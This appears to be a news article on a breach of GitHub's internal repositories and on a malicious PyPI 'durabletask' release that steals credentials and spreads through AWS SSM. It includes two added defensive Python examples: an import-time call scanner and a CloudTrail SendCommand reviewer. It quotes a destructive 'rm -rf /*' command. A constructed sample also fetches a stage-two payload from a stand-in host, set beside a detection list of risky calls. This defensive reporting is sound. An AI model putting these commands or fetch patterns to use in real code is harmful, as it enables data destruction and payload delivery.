GitHub Investigating Unauthorized Access to Internal Repositories, Says Customer Data Not Impacted

GitHub has confirmed that it is investigating unauthorized access to some of its internal repositories. The company shared the update through its official X account and said it is closely monitoring the situation.

In its statement, GitHub said there is currently no evidence that customer information stored outside of GitHub’s internal repositories has been affected. This includes enterprise accounts, organizations, and user repositories.

The incident became public after TeamPCP reportedly listed GitHub source code and internal organizational data for sale on a cybercrime forum. According to screenshots shared online, the group claimed to have stolen around 4,000 repositories and was asking for at least $50,000 for the data.

TeamPCP also posted on X claiming that GitHub had known about the incident for hours but delayed acknowledging it.

GitHub later confirmed that the attackers’ claims about the number of repositories are “directionally consistent” with its own investigation so far.

GitHub revealed the initial entry point of the attack. According to the company, the compromise started from an employee’s device infected through a poisoned Microsoft Visual Studio Code extension.

This information is important because VS Code extensions often run with broad access to development environments. A malicious extension can potentially access authentication tokens, local repositories, developer secrets, and cloud credentials stored on a machine.

GitHub says it quickly detected and contained the compromise and has already rotated critical secrets to reduce further risk.

At this point, the company believes only GitHub-internal repositories were accessed. But security researchers are paying close attention because internal repositories can contain deployment scripts, CI/CD configurations, infrastructure tooling, and security-related code that attackers may later abuse in broader supply chain attacks.

The incident also appears connected to TeamPCP’s ongoing campaign targeting open-source ecosystems through malicious packages.

Around the same time, researchers discovered compromised versions of Microsoft’s official “durabletask” Python package on PyPI. The malicious versions include 1.4.1, 1.4.2, and 1.4.3.

Wiz said the attacker first compromised a GitHub account through an earlier attack and then extracted GitHub secrets from a repository the victim had access to. Those secrets eventually exposed the PyPI publishing token used to upload malicious versions of the package.

The infected package reportedly downloaded a second-stage payload called “rope.pyz” from attacker-controlled infrastructure as soon as the package was imported into a project.

Researchers say the malware specifically targeted Linux systems commonly used in cloud servers, developer pipelines, and production environments.

SafeDep analyzed the payload and said the malware was designed to steal credentials linked to major cloud providers, password managers, developer tools, SSH keys, Docker credentials, VPN configurations, and shell history.

The company also said the malware attempted to access secrets stored in HashiCorp Vault and unlock password managers like 1Password and Bitwarden.

What makes the malware more dangerous is its ability to spread automatically inside cloud infrastructure.

Aikido Security said the malware could propagate itself across AWS EC2 environments using AWS Systems Manager. In Kubernetes environments, the malware reportedly spread using kubectl commands to execute payloads on connected containers and nodes.

This means a single infected machine inside a company’s cloud environment could potentially lead to lateral movement across multiple systems.

Aikido Security also uncovered another disturbing behavior. If the malware detected Israeli or Iranian regional settings, there was reportedly a one-in-six chance it would execute a destructive “rm -rf /*” command capable of wiping Linux systems.

StepSecurity later shared additional details about the worm-like propagation mechanism. According to the company, the malware used AWS Systems Manager’s SendCommand feature to spread itself to as many as five additional EC2 instances per AWS profile.

StepSecurity also said the malware included a backup communication mechanism called FIRESCALE. Instead of relying on a single command-and-control server, the malware searched public GitHub commit messages for encoded backup server information. This technique makes takedown efforts more difficult because attackers can dynamically switch infrastructure without directly embedding new servers into the malware.

Researchers believe the campaign may continue expanding because the malware spreads using stolen developer tokens and cloud credentials collected from infected environments.

Peyton Kennedy from Endor Labs warned that the malicious package executes silently the moment it is imported, without showing visible signs of compromise.
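The reason a package can act "the moment it is imported" is that anything at module scope of a Python package runs during import, including a harmless-looking helper that the module body calls at the bottom. The following added example (not code from the article, GitHub, Microsoft or any of the researchers cited) shows a defender-side audit: it parses a module with Python's `ast` module and reports network, process or `exec`-style calls that are reachable at import time, following into module-level functions that the module body itself invokes. The list of call names and the two sample modules are constructed for the example.

```python
import ast

# Callees worth a second look when they execute during import. This set is an
# assumption made for the example, not an exhaustive indicator list.
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "urlopen",
    "urllib.request.urlretrieve", "urlretrieve",
    "requests.get", "requests.post", "socket.socket",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "exec", "eval",
}


def _call_name(func):
    """Render the callee of an ast.Call as a dotted string, e.g. 'urllib.request.urlopen'."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None  # e.g. a call on the result of another call; not a plain name


def import_time_findings(source, filename="<module>"):
    """Return sorted (lineno, callee) pairs for suspicious calls that run on import.

    Only module-scope statements execute at import time, so function and class
    bodies are skipped, except that module-level functions which the module body
    calls are followed, since that is the usual way an import-time hook is hidden.
    Nested defs inside such a helper are included too, a slight over-approximation.
    """
    tree = ast.parse(source, filename)
    defs = (ast.FunctionDef, ast.AsyncFunctionDef)
    local_funcs = {n.name: n for n in tree.body if isinstance(n, defs)}
    findings, visited = set(), set()

    def scan(nodes):
        for node in nodes:
            for call in (c for c in ast.walk(node) if isinstance(c, ast.Call)):
                name = _call_name(call.func)
                if name in SUSPICIOUS_CALLS:
                    findings.add((call.lineno, name))
                elif name in local_funcs and name not in visited:
                    visited.add(name)
                    scan(local_funcs[name].body)  # follow the helper the module body calls

    scan(s for s in tree.body if not isinstance(s, defs + (ast.ClassDef,)))
    return sorted(findings)


# Constructed sample: ordinary library code, nothing runs at import beyond definitions.
BENIGN = '''\
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

# Constructed sample mimicking the pattern the article describes: a helper that
# fetches a remote blob, swallows errors, and is invoked at module scope.
SUSPICIOUS = '''\
import os
from urllib.request import urlopen

def _warmup():
    try:
        blob = urlopen("http://example.invalid/stage2").read()
    except Exception:
        pass

def do_work():
    return os.system("true")   # only runs if a caller invokes do_work()

_warmup()
'''


if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, import_time_findings(src))
```

Run this over the `__init__.py` of a package you are about to trust (reading the file rather than importing it) before it ever executes; the benign sample yields no findings, while the suspicious one reports the `urlopen` call on its line 6 and correctly ignores `os.system` inside `do_work`, which nothing calls at import time.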

The researcher also noted that the durabletask package receives roughly 417,000 downloads every month, raising concerns that many development pipelines may already have been exposed before the malicious versions were discovered and removed.

Security experts are now advising organizations to immediately treat systems running the affected package versions as fully compromised. Developers are also being urged to rotate credentials, review CI/CD secrets, audit cloud access logs, and check for unauthorized AWS Systems Manager activity.
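One concrete way to "check for unauthorized AWS Systems Manager activity" is to review CloudTrail for `SendCommand` calls. The added example below (not from the article or any of the vendors it cites) loads CloudTrail-format records, and flags `ssm:SendCommand` events issued by a principal outside an expected allowlist or fanning out to an unusual number of distinct instances, noting when the command document is `AWS-RunShellScript`. The allowlisted role ARN, the spread threshold, the account number, instance IDs and the three sample records are all constructed for the example.

```python
import json
from collections import defaultdict

# Assumptions for the example: which principals legitimately issue SSM commands
# in this account, and how many distinct targets one principal may reach before
# the fan-out heuristic fires.
EXPECTED_SSM_PRINCIPALS = {
    "arn:aws:sts::123456789012:assumed-role/DeployRole/ci-runner",
}
SPREAD_THRESHOLD = 3


def load_records(text):
    """Parse a CloudTrail log file (JSON object with a 'Records' array)."""
    return json.loads(text)["Records"]


def _targets(params):
    """Collect what a SendCommand was aimed at: explicit instance IDs or tag targets."""
    ids = set(params.get("instanceIds") or [])
    for t in params.get("targets") or []:
        ids.add(f"{t.get('key')}={','.join(t.get('values') or [])}")
    return ids


def review_ssm_events(records):
    """Return [(eventID, [reasons])] for SendCommand calls that warrant investigation.

    A finding is raised for an unexpected principal or for fan-out beyond the
    threshold (counted cumulatively per principal across the log); the command
    document is appended as context so an analyst sees shell execution at a glance.
    """
    seen_by_principal = defaultdict(set)
    findings = []
    for rec in records:
        if rec.get("eventSource") != "ssm.amazonaws.com" or rec.get("eventName") != "SendCommand":
            continue
        principal = rec.get("userIdentity", {}).get("arn", "<unknown>")
        params = rec.get("requestParameters") or {}
        seen_by_principal[principal] |= _targets(params)
        reasons = []
        if principal not in EXPECTED_SSM_PRINCIPALS:
            reasons.append("unexpected principal")
        reached = len(seen_by_principal[principal])
        if reached >= SPREAD_THRESHOLD:
            reasons.append(f"fan-out to {reached} instances so far")
        if reasons and params.get("documentName") == "AWS-RunShellScript":
            reasons.append("document AWS-RunShellScript")
        if reasons:
            findings.append((rec.get("eventID"), reasons))
    return findings


# Constructed CloudTrail excerpt: one routine patch run by the deploy role, then two
# shell-execution commands from an IAM user that together reach four instances.
SAMPLE_CLOUDTRAIL = """{"Records": [
 {"eventID": "ev-1", "eventTime": "2026-03-24T10:00:00Z",
  "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
  "sourceIPAddress": "10.0.0.5",
  "userIdentity": {"type": "AssumedRole",
    "arn": "arn:aws:sts::123456789012:assumed-role/DeployRole/ci-runner"},
  "requestParameters": {"documentName": "AWS-RunPatchBaseline",
    "instanceIds": ["i-0aaa1111"]}},
 {"eventID": "ev-2", "eventTime": "2026-03-24T10:05:00Z",
  "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
  "sourceIPAddress": "198.51.100.7",
  "userIdentity": {"type": "IAMUser",
    "arn": "arn:aws:iam::123456789012:user/dev-laptop"},
  "requestParameters": {"documentName": "AWS-RunShellScript",
    "instanceIds": ["i-0bbb2222", "i-0ccc3333"]}},
 {"eventID": "ev-3", "eventTime": "2026-03-24T10:06:00Z",
  "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
  "sourceIPAddress": "198.51.100.7",
  "userIdentity": {"type": "IAMUser",
    "arn": "arn:aws:iam::123456789012:user/dev-laptop"},
  "requestParameters": {"documentName": "AWS-RunShellScript",
    "instanceIds": ["i-0ddd4444", "i-0eee5555"]}}
]}"""


if __name__ == "__main__":
    for event_id, reasons in review_ssm_events(load_records(SAMPLE_CLOUDTRAIL)):
        print(event_id, "; ".join(reasons))
```

Point it at exported CloudTrail files (or the output of a CloudTrail Lake query shaped the same way) for the window in which the affected package could have been installed; the deploy role's patch run passes, while both `dev-laptop` events are reported, the second one additionally for having reached four distinct instances.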

Deepanker Verma
